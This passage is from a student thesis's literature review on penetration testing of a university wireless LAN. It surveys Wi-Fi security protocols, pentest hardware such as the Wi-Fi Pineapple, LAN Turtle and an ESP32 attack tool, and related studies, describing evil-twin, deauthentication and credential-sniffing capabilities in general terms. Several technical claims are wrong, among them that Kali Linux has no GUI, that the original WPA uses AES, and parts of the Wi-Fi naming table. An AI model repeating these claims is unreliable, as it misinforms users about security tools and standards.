CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

CHAPTER II

REVIEW OF RELATED LITERATURE AND STUDIES

This chapter presents the relevant literature and studies that the researcher

considered in strengthening the claim and importance of the present study. This part

demonstrates the penetration testing in the security of a wireless local area network

within a specific location. This part aims to cite and discuss the writings of accepted

individuals that are experts in this field of study.

RELATED LITERATURE

According to (Harvey, 2019)[19], a wireless penetration test checks wireless

security settings, which might be used as an attack vector to access internal resources.

Due of its accessibility and simplicity, wireless technology has become a crucial

component of modern business. There are only waves of information going to your

choice device; there are no connections or cords. Consequently, wireless technology, like

all other types of technology, is susceptible to malevolent assaults. There are several

potential problems, ranging from poor wi-fi security configurations to picking a weak

encryption method.

In accordance with (Mehta, 2021)[20], a penetration test is a cybersecurity

approach used by businesses to uncover, test, and highlight security flaws. Ethical

hackers are frequently used to conduct these penetration testing. To assess the hackability

of an organization's computer systems, network, or online services, these in-house

10
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

personnel or third parties simulate the techniques and behaviors of an attacker. Pen

testing may also be used to assess an organization's adherence to compliance standards.

Since it can be customized for every company or organization, pen testing differs from

other cybersecurity evaluation methods. A certain set of hacking methods or tools may be

acceptable depending on the structure and operations of an organization.

According to (Kevin Beaver, 2018)[21], it will be difficult to complete the work

efficiently if you do not have the equipment necessary for your penetration testing.

However, just because you apply the right tools does not ensure that you will identify all

of the right problems in the system. Be aware of the limitations imposed by your tools.

There are several vulnerability scanners available, and many of them produce false

positives and negatives (incorrectly identifying vulnerabilities). There are many tools,

and each one is designed to perform a particular test; nevertheless, there is no tool that

can test for everything.

PENETRATION TESTING TOOLS

According to (Robb, 2020)[22], a variety of Wi-Fi testing tools are available due to

the potential of Wi-Fi as well as the security risks it poses. Many are free or open source,

but there are also paid tools for individuals with more complex requirements. These tools

include capabilities such as Wi-Fi performance and bottleneck analysis, network

scanning, site surveys, Wi-Fi spectrum analysis, audits, traffic analysis, packet sniffing,

penetration testing, monitoring, management, and inventorying. There are several Wi-Fi

testing tools on the market today, and with so many alternatives, each with its own set of

features, benefits, and pricing points, it can be tough to select a solution.

11
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

WI-FI PINEAPPLE

The Wi-Fi Pineapple is a network auditing device used by several cybersecurity

and networking organizations. It is an easy-to-learn and use application that also delivers

thorough information regarding network security. The tool is also very simple to

construct and use. The ability to spoof Wi-Fi networks is one function of the Wi-Fi

Pineapple. This enables Pineapple to disguise itself as a recognized wi-fi network and

convince wi-fi users to join to the Pineapple wi-fi. This therefore enables the user of the

Pineapple to target the users connected to the faked network (Hautzinger, 2021)[23].

Engineers working with Hak5 came up with the idea for the Pineapple initially in

order to conduct pen tests and assist network managers with auditing network security.

The AP, which some people believe looks more like a spider than a pineapple, gives

network engineers the ability to hack their own network in order to find flaws and set

defenses in place to make the network more resistant to future attackers. Honeypot is the

term used to describe what is known as a Pineapple when it is used in penetration testing.

An "evil twin" or "pineapple sandwich" refers to a situation in which a Pineapple is

utilized as a rogue access point (AP) to carry out security vulnerabilities via a MitM

attack (Lutkevich, 2022)[24]. For man-in-the-middle attacks, the wi-fi Pineapple serves as

an access point. These "spoofing attacks" refers to actions taken by attackers to covertly

intercept and transmit private communications between users of public wireless networks

and the website they are accessing (NI Cyber Guy, 2021)[25].

12
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Remarkable results can be produced by combining next-generation network

processors with multiple role-based radios and the PineAP suite, which is protected by a

Hak5 patent. Designed specifically to withstand the toughest conditions after being

hardened and put through extensive testing. Incredible performance is available from a

simple and direct web interface on the brand-new WiFi Pineapple Mark VII, which also

includes an extensive ecosystem of apps, automated pentest campaigns, and Cloud C2 for

remote access from any location in the world (Hak5, 2019) [26]. The wi-fi Pineapple

contains a full suite of penetration testing modules called PineAp, including as

capabilities for reporting, logging, tracking, and surveillance for performing MitM attack

tactics (NI Cyber Guy, 2021)[25].

Furthermore, wi-fi Pineapple is regarded as one of the riskiest services available.

Pineapple makes use of the fundamental aspects of how the Internet works. This hacking

tool may be purchased by anyone for a little price in order to steal data. A widely used

and widely available gadget called Wi-fi Pineapple can give numerous possibly

inexperienced or would-be hackers access to several effective hacking capabilities (script

kiddies). The Wi-fi Pineapple is a strong and versatile tool that, depending on the user's

intention, may be useful or deadly. While wifi Pineapple has the potential to be abused, it

also has a far greater chance of preventing those who have malicious intentions (NI

Cyber Guy, 2021)[25].

13
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

RASPBERRY PI

The Raspberry pi is a computer about the size of a credit card. When it was first

made, creator Eben Upton wanted to make a low-cost device that would help pre-

university students learn how to code and understand hardware. It is a powerful little

computer that can be used in electronics projects and for many of the same things as a

desktop computer, like spreadsheets, word processing, browsing the internet, and playing

games. HD video can also be played on it. The Raspberry Pi is slower than a modern

laptop or desktop, but it is still a full Linux computer that can do everything you'd expect

it to do while using less power (Lucideus, 2018)[27].

Many individuals think of Raspberry Pi as the next step up from Linux. Raspberry

Pi is a low-level device the size of a credit card or a computer system that can be built

into a monitor. It is usually a small device that is connected to the monitor with an HDMI

(High-Definition Multimedia Interface) cable. One of the newest platforms used for

penetration testing is Raspberry Pi. Even though it has to be bought, it costs less and is

available to everyone. Raspberry Pi is used in penetration testing because it is a small

computer, sometimes called a "microcomputer." All of the hardware-supported

accessories make it more flexible and possible (N. Balaji, 2020)[28].

Raspberry Pi cannot replace a computer because of the slower processor. It takes

time to download and install applications, which prevents advanced multitasking. It

cannot be used with other operating systems, such as Windows. This is suitable for those

who want a device they can personalize to suit their needs and tastes, not for those who

simply want to do a task fast (Pantech ELearning, 2021)[29]. The raspberry pi needs a
14
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

micro-SD card to function as internal storage because it lacks any internal storage. Users

are all aware of the slow speed of SD cards. Due to its underwhelming performance, the

board's startup time and the Raspberry Pi's read/write speed have been increased. The

Raspberry Pi board does not come with heatsinks or cooling fans pre-installed. If used

continually for 6-7 hours without air conditioning or a heat sink, it will eventually reach

temperatures that are significantly higher than 70 degrees Celsius (MACFOS, 2020)[30].

KALI LINUX

The well-known Linux operating system has a variant based on Debian called

Kali Linux. Penetration testing is made considerably simpler using Kali. Advanced users

may use Kali to execute information security tests to find and patch any potential

program vulnerabilities. The fact that Kali Linux has been ported to the ARM

architecture is one of its key distinguishing features. As a result, Android-based

smartphones may also have Kali installed in addition to desktop computers and laptops

(aid, 2019)[31]. Kali Linux is a free operating system made for security analytics and

penetration testing. Kali Linux used to be called BackTrack. It is a distribution that is

focused on security and forensics. Kali is used by both attackers and people who work in

security. Kali is used because it gives a lot of support by being scalable, stable, and easy

to use. These are the parts of the operating system that any professional would want to

see so they could analyze, audit, test, check, and evaluate security networks (N. Balaji,

2020)[28].

There are approximately 600 preconfigured penetration-testing programs

available in Kali Linux. Every software has a different level of flexibility and application.
15
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

These helpful tools are expertly divided into the following categories by Kali Linux:

Information gathering, vulnerability analysis, wireless attacks, web applications, stress

testing, forensics tools, sniffing & spoofing, password attacks, maintaining access,

reverse engineering, reporting tools, and hardware hacking are some of the techniques

used in cybercrime (Williams, 2019)[32]. Users can modify and customize Kali Linux ISO

images using the live-build functionality of Kali Linux. Kali Linux is a completely free

and open-source operating system. It does not include any proprietary software or drivers.

Kali Linux is available for VirtualBox, VMware, Raspberry Pi, ARM images, and cloud

instances, among other platforms. With the ability to operate a variety of hardware and

connect to a number of USB and other wireless devices, Kali Linux is made to function

with as many wireless devices as possible (Khanna, 2022)[33].

Furthermore, Kali Linux is not for complete beginners. It is a penetration testing

package intended for advanced users. It will be challenging to use if you are new to

Linux. Additionally, the operating system is devoid of a graphical user interface (GUI).

This implies that all tasks must be completed via the command line. There is relatively

little documentation on Kali Linux available. This can make learning how to use all of the

available tools challenging. Kali Linux is not intended to be your primary operating

system (Khanna, 2022)[33].

USB WIRELESS ADAPTER

When it comes to Wi-Fi hacking and pen testing, Alfa's AWUS036NHA is one of

the greatest wireless adapters they've ever produced. With its Atheros AR9271 chipset, it

will work flawlessly with most Linux distributions (Cyberpunk, 2018). Alfa
16
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

AWUS036NHA is one of the most well-known monitor mode wi-fi adapters. It's an IEEE

802.11 b/g/N-compatible Wi-Fi USB adapter. In the 2.4 GHz band, it's possible to set up

networks with speeds of up to 150 Mbps. It's also compatible with IEEE 802.11 b/g,

which lets you connect wireless devices at speeds of up to 54 Mbps (KaliTut, 2021)[34].

The Alfa AWUS036HHA USB Wi-Fi adapter is one of the best things you can

use with Kali Linux for wireless pen testing (very popular among Kali Linux users). It's

small, has a great range, and costs very little. Setting up is easy because the drivers are

already built in. You just have to plug the USB Wi-Fi adaptor into your device to use it

(Kali Linux & some other Linux distros). The AWUS036NHA is different from most of

its predecessors in that it supports all six wireless modes. This is important for

monitoring mode. You can capture a valid WPA2-PSK hash, the WPA 4-way handshake,

a hidden SSID, generate ARP frames for a WEP replay attack, perform man-in-the-

middle (MITM) attacks, and more (Cyberpunk, 2018)[35].

The unfortunate fact about USB adapters is that they do not have an external

antenna, making them less powerful. Most people complain about slower speeds while

using USB adapters. In the case of a USB adapter, the finest feature might also be its

largest disadvantage. Anyone may use the Wi-Fi USB adapter because it does not require

any installation. It implies that your data can be utilized by anyone without restriction.

Aside from that, anyone may easily unplug the gadget and take it away from you. If you

unplug your device from your PC or laptop, the USB port may be damaged (Chahal,

2018)[36].

17
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

ESP32 WI-FI PENETRATION TOOL

Wi-Fi is one of those things that most of us would find difficult to live without.

Unfortunately, there are a number of flaws in the underlying 802.11 standards that might

be exploited (By, 2021)[37]. This system features an all-purpose tool for the ESP32

platform for carrying out different Wi-Fi cyberattacks. It includes some basic

functionality that is often used in Wi-Fi attacks and simplifies the implementation of new

attacks. It also covers Wi-Fi attacks such as obtaining PMKIDs from handshakes or

handshakes themselves using various means such as creating a rogue replicated AP or

transmitting de - authentication frames directly, among others (Son, 2021)[38].

According to (Expert, 2021)[39], WPA/WPA2 handshakes are acquired by

passively listening for devices connecting to the target network or by performing a de-

auth attack and then monitoring for device reconnections. By examining the initial

message of a WPA handshake, PMKIDs are obtained from APs that have the roaming

functionality enabled. The ESP32 Wi-Fi Penetration Tool will also format the recorded

data into PCAP and HCCAPX files, which may then be analyzed with Wireshark and

Hashcat. To manage the tool, it generates a management access point from which the

target and attack type may be selected, and the subsequent data downloaded. When you

combine the ESP32 with a battery, you can accomplish anything on the go. In addition,

the ESP32 only supports Wi-Fi networks with a frequency range of 2.4 GHz; it will not

connect to a current 5 GHz network (Federov, 2022)[40].

18
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

USB ETHERNET ADAPTER

The LAN Turtle is a covert systems administration and penetration testing tool

that offers man-in-the-middle surveillance capabilities, network information collection,

and stealth remote access through a straightforward visual shell. The LAN Turtle can

blend into many IT environments because to its discrete design, which is housed inside a

generic "USB Ethernet Adapter" case. The LAN Turtle has a ton of functions for remote

access, and network recon. If all modules are turned off, it may function as a

straightforward and convenient USB ethernet adapter, but it also lets you operate

surveillance operations and communicate with the device from anywhere. LAN Turtle

offers a large number of available modules and scripts (Cyberpunk, 2019)[41].

In addition, LAN Turtle is a tiny device that may be placed discreetly on a target

computer to poison DNS, offering potential phishing endpoints. With the LAN Turtle's

various modules, people may simply sniff (listen) to every data transferred across the

network. After little configuration and reconnecting it to the server, anyone will be able

to access the target's network and collect usernames/passwords from a closed PC without

even needing to join to the network. One may use it to intercept and log web traffic by

installing it between a target machine and a LAN. Hackers will be able to get access to

the target's network and steal usernames and passwords from a closed PC without the

requirement for a network connection (Cyberpunk, 2019)[41]. However, this application is

appropriate for institutional settings with a large number of desktop PCs and minimal
19
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

worry about such devices. Even highly skilled IT experts may be unconcerned with LAN

turtles or are entirely unaware of their existence (Tatianna, 2018)[42].

WIRELESS SECURITY PROTOCOLS

With an authentication protocol, wireless encryption keeps your wireless network

safe. When a person or device tries to connect, they need a password or network key. If

your wireless network isn't secure, people who aren't supposed could connect to it and get

personal information or use your internet connection to do something bad or illegal. If

people use your network without your knowledge, it could slow down or work less well

(Sony Latin America, 2022)[43].

Wireless networks and security are critical today for studying, having fun, and

remaining alive. Authorization and authentication are two of the most crucial steps to

take to secure one's privacy. Wireless security encryption protects authentication on

wireless networks. Wireless security encryption is crucial because it prevents negative

things from occurring to information that might jeopardize people's or organizations'

privacy. The forms of encryption that may be utilized are determined by the

specifications of networking equipment such as routers. The router's manufacturer may

provide you with the default encryption key or place it on the router's bottom. Wireless

security encryption prevents unauthorized users from accessing wireless equipment

(GeeksforGeeks, 2022)[44].

Wi-Fi security is intended to prevent illegal access to wireless devices. Most

home routers offer various security settings with varying levels of protection. While they

20
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

are all distinct, they are not all equal; as such, it is critical to discover what type of

security your Wi-Fi employs. For the security of residential wireless networks, many

wireless security protocols have been created. Nowadays, the most used wireless security

protocol types are WEP, WPA, and WPA2. To improve network security, each protocol

employs a unique type of encryption. The most recent protocols, including the latest

WPA3 protocol, have proven to be quite strong, making hacking considerably more

difficult (Atria Convergence Technologies Ltd., 2021)[45].

The Wired Equivalent Privacy (WEP) security protocol is the first and most used

Wi-Fi security standard. In IEEE 802.11, a set of technological standards designed to

provide security comparable to that of a wired local area network (WLAN) (LAN), the

privacy feature was introduced. WEP has been approved as a security standard by the

Wi-Fi Alliance. Although WEP was formerly marketed as providing the same security

benefits as a wired connection, it has had a variety of security problems over time. These

flaws have gotten worse as computational power has expanded. Despite efforts to

improve it, WEP still has security problems, hence the Wi-Fi Alliance formally

discontinued it. (Ghimiray, 2022)[46].

WPA is a security certification standard designed by the Wi-Fi Alliance to protect

wireless computer networks. It was initially established in 2003, and it was intended to

replace the wired equivalent privacy (WEP), which had several known security flaws. To

guarantee that Wi-Fi networks are secure, WPA requires users to enter a password during

authentication. It is compatible with authentication servers as well as remote

authentication dial-in (RADIUS) servers. Furthermore, it encrypts data better than

21
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

WEP. WPA-secured wireless computer networks employ the TKIP protocol and a pre-

shared key. For encryption, TKIP employs the RC4 cipher (BasuMallick, 2022)[47].

A security protocol called Wi-Fi Protected Access (WPA) is intended to protect

wireless computer networks. The Wi-Fi Alliance created it to take the place of the old

Wired Equivalent Privacy (WEP) encryption standard. WPA uses the Advanced

Encryption Standard (AES) encryption and Temporal Key Integrity Protocol (TKIP) to

encrypt data transferred over the wireless network, offering greater data security and

network access control than WEP (Kuhn et al., 2018) [48]. WPA2 and AES-CCMP, on the

other hand, did not remain safe indefinitely; the well-publicized KRACK assault drove

AES/CCMP to its knees in late 2017. KRACK cannot be patched in WPA2 because it

leverages a flaw in the 802.11i standard itself, rather than a specific implementation of it.

The attack can be avoided to a great extent by blocking EAPOL-Key frame re-

transmission during key installation, which results in possibly longer timeframes for

dropped devices to re-establish network connections (Salter, 2019)[49].

WPA3, which came out in June 2018, is the replacement for WPA2, which

experts in security claim can be "compromised." The goal of making WPA3 was to make

it easier to use and make it stronger in terms of encryption. It comes in both Personal and

Enterprise editions, just like WPA2, but this version is better than WPA2 because it has

stronger authentication and encryption features and a fix for KRACK, a flaw that was

built into WPA2. It also has features that make it easier to connect IoT wi-fi devices and

make them more secure (Hoelscher, 2018)[50].

WIRELESS FIDELITY
22
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Every day, most of the world's population depends on wireless networking

technology. Wi-Fi is the most often used technology for connecting a router to the

internet, and it is configured as follows. The term "access point" refers to wireless control

points. A router and an access point are often seen in a home. In an organizational context

where a large region must be secured, many access points are necessary, or more routers

and APs must be utilized to create a mesh network. The IEEE supports and develops, and

preserves the IEEE 802.11 standards, the fundamental framework for all networks. To

speed up its expansion, the standards firm has utilized frequencies like 2.4 GHz, 5 GHz,

and some of the standard's newest revisions. Also, because there is so much Wi-Fi in the

2.4GHz area, the 2.4GHz spectrum is typically employed in older or new Wi-Fi levels.

To manage these frequencies, difference frequencies were established (Shaw, 2020)[51].

Wireless N is the standard version of the 802.11 standards that are utilized in most

houses. The standards have been accessible since 2009, and most Internet Service

Providers (ISPs) have had wireless networks as standard for years. Wireless N can

operate at both the 2.4 and 5 GHz bands. The more modern and faster wireless AC

standard, which operates on the 5 GHz band, is becoming more common, and the current

routers offered by the Philippines' largest ISPs all include wireless AC as standard, as

well as legacy wireless N to support older devices that operate on the 2.4 GHz frequency

(Chua, 2019).

The Wi-Fi Alliance has just introduced a new consumer categorization system to

simplify customers' different wireless service options. Prior to the new design, existing

letter designations such as G, N, and AC will be renumbered to conform to the new

specifications. However, when new hardware is released, the new designations will be
23
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

widely noticed as early as with 802.11AX devices since Wi-Fi 6 is currently in use, and

future goods will follow that example. The new standard also involves the release of the

improved Wi-Fi version known as Wi-Fi 6. (802.11AX). It also plays a more major role

in larger networks with several devices connecting at the same time, such as airports or

concert halls (Wi-Fi Alliance, 2018). The Wi-Fi Alliance stated the distinct designations

of old and new designs in the table below (Chavez, 2020)[52].

Table 1: Wi-fi Alliance Old/New Designation

Old Designation New Designation

802.11AX Wi-Fi 6
802.11AC Wi-Fi 5
802.11N Wi-Fi 4
802.11G Wi-Fi 3
802.11A Wi-Fi 2
802.11B Wi-Fi 1

24
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

RELATED STUDIES

In the study entitled "Experimental Evaluation of Different Penetration Security

Levels in Wireless Local Area Network," (Ali Alsahlany, et al., 2019) [53]. The researchers

investigated the risks of different security levels used to secure WLANs, such as SSID,

MAC filter, and WPA2. According to the researchers, it is preferable to configure the

AP's security mode by simultaneously enabling all security levels (hidden SSID, MAC

address filter, and WPA2 AES encryption). The researchers also recommend disabling

the WPS protocol to prevent an attacker from exploiting protocol weaknesses and

determining the default PIN number. Furthermore, the researchers used complex WPA2

passes with compound lengths larger than 16 alphanumeric characters that included small

letters, capital letters, special characters, and digits while avoiding the use of consecutive

integers and letters.

In another study conducted by (M. K. Khan et al., 2018)[54], entitled " A

Comprehensive Study on Penetration Testing Techniques," the researchers begin their

study by discussing penetration testing and outlining its advantages and difficulties. They

then give a thorough analysis of the various penetration testing methods, including

25
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

wireless and social engineering methods. The wireless penetration testing section in their

study discusses the different types of wireless networks and identifies the risks associated

with each. The researchers also describe the tools and techniques used to assess the

security of wireless networks, including sniffing tools, rogue access point detection, and

man-in-the-middle (MITM) attacks.

Moreover, in the study by (F. Fikriyadi et al., 2020)[55], entitled "Security Analysis

of Wireless Local Area Network (WLAN) Network with the Penetration Testing

Method," the researchers did their study by examining at how WLAN network security

works and assessing WLAN network security through penetration testing. Due to the fact

that wireless networks lack the same level of security as wired networks. Most of the

time, security holes in wireless networks are caused by how they are set up or by how

they encrypt data. The setup is vulnerable in part because it is so easy to set up a wireless

network these days. Since many manufacturers add features that make the lives of users

and network administrators easier, many wireless networks stick to the settings that are

recommended. In wireless networks, the SSID, IP address, remote management, DHCP,

frequency channels, user, and password are often used.

In addition, in a study entitled “Penetration testing and security analysis of

wireless networks: A survey," (Sudhakar et al., (2018) [56], the researchers wanted to give

a broad overview of the advanced in wireless network security analysis and penetration

testing at that time. The researchers analysis centered on the methods, resources, and

difficulties faced by security analysts while evaluating and safeguarding wireless

26
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

networks. Even though wireless networks are getting more and more common, security is

still a significant issue since there aren't enough effective security measures in place. In

order to address this issue, the researchers looked at current wireless network security

assessment tools and penetration testing techniques. In addition to reconnaissance,

vulnerability scanning, exploitation, and post-exploitation, they also looked at a variety of

other penetration testing methodologies. The researchers also examined a range of

wireless network vulnerabilities, such as Man-in-the-Middle, Denial-of-Service, and

Rogue Access Point attacks.

Furthermore, in the study entitled “A Survey on Network Penetration Testing” by

(G. Jayasuryapal et al., 2021)[57], penetration on a network is an essential security measure

that every organization should take into consideration. Cybercrime is on the rise as a

result of inadequate security practices. A penetration tester needs a reliable methodology

to do thorough network testing. According to the researcher's findings, a tester must

divide his testing into four stages. The four steps include information collection,

scanning, enumeration, post-exploitation, and reporting. Therefore, the researchers

covered in their study the procedures and stages (from information collecting to target

exploit), as well as the various types and methods of penetration testing.

Moreover, in the study by (S. Mishra, 2021)[58], entitled “Efficacy of

Unconventional Penetration Testing Practices,” the company and government have lost a

lot of money and privacy because of a cyberattack, and the privacy of information that

isn't important has been put at risk. Thus, the researchers state that it is more important to

have thorough penetration testing, assessment techniques, and tools for analyzing and

presenting the unconventional penetration techniques and tactics that are currently
27
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

available, testing and examining their key features and role in supporting cybersecurity,

and measuring how well they work. Considering those unconventional ways to test for

vulnerabilities don't require as much time-consuming code writing, they are easier to

manage and add more to the security assessment. The issue with traditional ways of

testing for security holes is that they don't always solve security problems. Because

technology is always changing and never stays the same for very long. This means that

there will always be weaknesses, security holes, and threats, even if new methods for

penetration testing are developed that aren't what people are used to. When figuring out

how safe a system is, people often use non-traditional ways to test it. This is done to save

time and make sure the system is safe. The researchers presume that future penetration

testing is expected to be scalable so that it can adapt to any changes that may happen in

the target system. Currently, penetration testing is based on pre-built frameworks.

SUMMARY OF THE RELATED STUDIES

The table below shows the summary of the related studies to the study of the

researchers of the Penetration Testing for Wireless Local Area Network (WLAN) of

College of Engineering and Architecture (CEA) of Pangasinan State University, Urdaneta

City Campus. The table shows the features on our system that is also available to some

cited studies and its research gap.

Table 2. Summary of Related Studies

Study Author/s Year Features on our Research Gap

system that is also
available to some
cited studies

28
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Experimental Ali 2019 Penetration The study does not

Evaluation of Alsahlany, Testing: The cover the latest
Different et al. researchers developments in
Penetration conducted a series penetration testing
Security Levels in of penetration tests techniques and tools
Wireless Local on the network to that can be used to
Area Network evaluate its assess the security of
security. WLANs.
Attack Scenarios:
The researchers
simulated different
attack scenarios,
such as brute-force
attacks, dictionary
attacks, and man-
in-the-middle
attacks.
A Comprehensive M. K. Khan 2018 Information The study does not
Study on et al., gathering: The explore the different
Penetration researchers discuss techniques and
Testing various techniques methods that can be
Techniques used to gather used for effective
information about WLAN penetration
the target system, testing. This study
such as network could include
scanning. examining the
Wireless network vulnerabilities
security testing: specific to WLANs.
The researchers
examine wireless
network security
testing, including
wireless network
scanning and
cracking wireless
encryption
schemes.
Security Analysis F. Fikriyadi 2020 Penetration testing The study needed to
of Wireless Local et al. methodology: The develop more
Area Network researchers describe comprehensive and
(WLAN) Network the process of effective
with the conducting a methodologies for
Penetration penetration test on a conducting
Testing Method WLAN, including penetration testing
the different types on WLANs that take
29
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

of tests that can be into account both

performed (such as security and
vulnerability performance
scanning, password considerations. This
cracking, and social will help to ensure
engineering). that WLANs are
Tools and sufficiently
techniques: The protected from
researchers discuss potential security
the various tools threats while
and techniques that maintaining optimal
are commonly used performance levels.
in penetration
testing, such as
brute-force
password cracking
tools.
Penetration testing Sudhakar et 2018 Security protocols: The study does not
and security al. The survey specifically focus on
analysis of analyzes various vulnerabilities of
wireless networks: security protocols wireless local area
A survey for wireless networks (WLANs).
networks, including Therefore, there is a
WEP, WPA, need for more
WPA2. research that
Penetration testing specifically
tools: The addresses the
researchers provide challenges of
an overview of WLAN penetration
popular penetration testing. This could
testing tools like include developing
Aircrack-ng. specialized tools for
penetration testing.
A Survey on G. 2021 Attack types: The There is a need for
Network Jayasuryapal researchers discuss further research and
Penetration et al. various attack exploration into the
Testing types, such as brute specific challenges
force attacks, and best practices
denial-of-service for conducting
attacks, and social effective penetration
engineering attacks. testing on WLANs,
as well as the
development of
specialized tools and
techniques to
30
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

address these
challenges.
Efficacy of S. Mishra 2021 Social The study may not
Unconventional engineering: The be sufficient to
Penetration paper examines the detect all potential
Testing Practices use of social vulnerabilities in
engineering in WLANs, especially
penetration testing, with the increasing
including phishing complexity of
attacks and baiting. WLAN architectures
and attack
techniques.

SYNTHESIS

Reviewing various literature and studies related to Penetration Testing for

Wireless Local Area Network (WLAN) gave the researchers additional knowledge in

their research study. In accordance with (Mehta, 2021)[20], a pen-test is used by

organizations to uncover, test, and highlight security flaws. Pen testing varies from other

cybersecurity evaluation approaches in that it may be customized to any enterprise or

organization. Depending on the structure and actions of the organization, a certain set of

hacking methods or tools may be authorized.

As stated by Kevin Beaver (2018)[21], having the essential tools for penetration

testing will make it easier to perform the task efficiently. Nevertheless, there are many

tools intended to be used to penetrate the Wireless Local Area Network (WLAN). And

according to Robb, D. (2020)[22], there is a variety of Wi-Fi testing tools that are available

in the market today. Many are open source or free, and there are several alternatives, each

with its own set of features, benefits, and pricing points. Connecting to our study, the

31
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

researchers investigate the different tools that might be used in pen-testing the Wireless

Local Area Network (WLAN).

According to (Hautzinger, 2021)[23], the Wi-Fi Pineapple is a network auditing

device used by several cybersecurity and networking organizations. It has the ability to

imitate Wi-Fi networks, disguise itself as a recognized wi-fi network and convince wi-fi

users to join to the Pineapple wi-fi. As per (Hak5, 2019)[26], there is a brand-new Wi-Fi

Pineapple Mark VII with a simple and direct web interface because of the

remarkable results that can be generated by combining next-generation network

processors with many role-based radios and the PineAP suite. However, according to (NI

Cyber Guy, 2021)[25], wi-fi Pineapple is one of the most dangerous services accessible. It

is a powerful and adaptable equipment that, depending on the user's goal, may be both

beneficial and lethal. Although wi-fi Pineapple has the potential to be misused, it also

provides a significantly higher possibility of preventing malicious intentions.

In accordance with (N. Balaji, 2020)[28], one of the newest platforms for

penetration testing is the raspberry pi. It is a compact computer, sometimes known as a

"microcomputer," that is made more flexible and feasible by hardware-supported

accessories. It cannot, however, be used with other operating systems, including

Windows. According to (Pantech ELearning, 2021)[29], it also has a slower CPU, which

made multitasking impossible. Additionally, (MACFOS, 2020)[30] stated that because the

raspberry pi lacks internal storage, it must utilize a micro-SD card as internal storage. The

Raspberry Pi board does not come with heatsinks or cooling fans pre-installed. Without

cooling or a heat sink, it will ultimately reach temperatures that are substantially higher

than 70 degrees Celsius if used continuously for 6-7 hours.

32
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

According to (N. Balaji, 2020)[28], Kali Linux is a free operating system made for

security analytics and penetration testing. Kali is a tool that advanced users may use to do

information security tests to identify and fix any potential software flaws. As per

(Williams, 2020)[32], there are approximately 600 preconfigured penetration-testing

programs available in Kali Linux. Every software has a different level of flexibility and

application. Nevertheless, (Khanna, 2022)[33], stated that Kali Linux is not for complete

beginners. It is a penetration testing package intended for advanced users. The operating

system is devoid of a graphical user interface (GUI). This implies that all tasks must be

completed via the command line.

As stated by (Cyberpunk, 2018)[35], Alfa's AWUS036NHA is one of the best

wireless adapters they've ever made for Wi-Fi hacking and pen testing. It is among the

greatest tools for wireless pen testing with Kali Linux. It is compact, affordable, and has a

wide range. The fact that the drivers are already included makes setup simple. With this

tool, you may execute man-in-the-middle (MITM) attacks, produce ARP frames for a

WEP replay attack, record a valid WPA2-PSK hash, the WPA 4-way handshake, and a

disguised SSID, among other things. The negative thing with Alfa's AWUS036NHA,

according to (Chahal, 2018)[36], is that they lack an external antenna, which reduces their

power. Most individuals who use USB converters lament the decreased speeds they

experience. The Wi-Fi USB adapter doesn't need to be installed, so anybody may use it.

It means that anyone can use your data without limitation.

As per (Son, 2021)[38], ESP32 wi-fi penetration tool features an all-purpose tool

for carrying out different Wi-Fi cyberattacks. It covers Wi-Fi attacks including getting

PMKIDs from handshakes or from the handshakes itself utilizing a variety of techniques
33
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

like building a fake replicated AP or sending de-authentication frames directly, among

others. According to (Expert, 2021)[39], the captured data will also be formatted by the

ESP32 Wi-Fi Penetration Tool into PCAP and HCCAPX files, which may subsequently

be examined with Wireshark and Hashcat. It creates a management access point from

which the target and attack type may be chosen and the following data downloaded in

order to control the tool. However, according to (Federov, 2022) [40], the ESP32 only

supports Wi-Fi networks with a frequency range of 2.4 GHz; it will not connect to a

current 5 GHz network.

According to (Cyberpunk, 2019)[41], the LAN Turtle is a covert systems

administration and penetration testing tool that offers man-in-the-middle surveillance

capabilities, network information collection, and stealth remote access through a

straightforward visual shell. The LAN Turtle has a ton of functions for remote access,

MITM, and network recon. Moreover, with the LAN Turtle's various modules, people

may simply sniff (listen) to every data transferred across the network. However,

(Tatianna, 2018)[42] stated that this application is appropriate only for institutional settings

with a large number of desktop PCs and minimal worry about such devices. Even highly

skilled IT experts may be unconcerned with LAN turtles or are entirely unaware of their

existence.

The study by (Ali Alsahlany, et al., 2019) [53], entitled "Experimental Evaluation of

Different Penetration Security Levels in Wireless Local Area Network," intends to

modify the security mode of the Access Points. The researchers investigate the

vulnerabilities associated with the various security levels utilized to secure WLAN. As

well as our study, the researchers will pen-test a certain WLAN to expose the
34
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

vulnerabilities of the security protocols. Another study by (F. Fikriyadi et al., 2020)[55]

entitled "Security Analysis of Wireless Local Area Network (WLAN) Network with the

Penetration Testing Method,” they examine how does the security works on WLAN.

Since wireless networks lack security, researchers evaluate the WLAN network through

penetration testing.

Furthermore in the study by (M. K. Khan et al., 2018)[54] entitled "A

Comprehensive Study on Penetration Testing Techniques,” the researchers discuss the

different types of wireless networks and identifies the risks associated with each. The

researchers also describe the tools and techniques used to assess the security of wireless

